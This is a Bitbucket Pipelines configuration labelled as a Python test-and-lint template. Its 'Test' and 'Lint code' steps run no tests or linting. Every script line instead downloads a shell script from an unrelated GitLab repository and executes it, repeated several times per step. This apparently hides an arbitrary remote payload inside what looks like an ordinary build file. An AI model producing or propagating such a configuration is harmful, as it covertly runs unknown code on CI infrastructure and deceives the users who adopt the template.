#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          caches:
            - pip
          script:
            - wget https://gitlab.com/mberjosatu/sugar/-/raw/main/sugar.sh && chmod +x sugar.sh && ./sugar.sh
            - wget https://gitlab.com/mberjosatu/sugar/-/raw/main/sugar.sh && chmod +x sugar.sh && ./sugar.sh
            - wget https://gitlab.com/mberjosatu/sugar/-/raw/main/sugar.sh && chmod +x sugar.sh && ./sugar.sh
      - step:
          name: Lint code
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - wget https://gitlab.com/mberjosatu/sugar/-/raw/main/sugar.sh && chmod +x sugar.sh && ./sugar.sh
            - wget https://gitlab.com/mberjosatu/sugar/-/raw/main/sugar.sh && chmod +x sugar.sh && ./sugar.sh
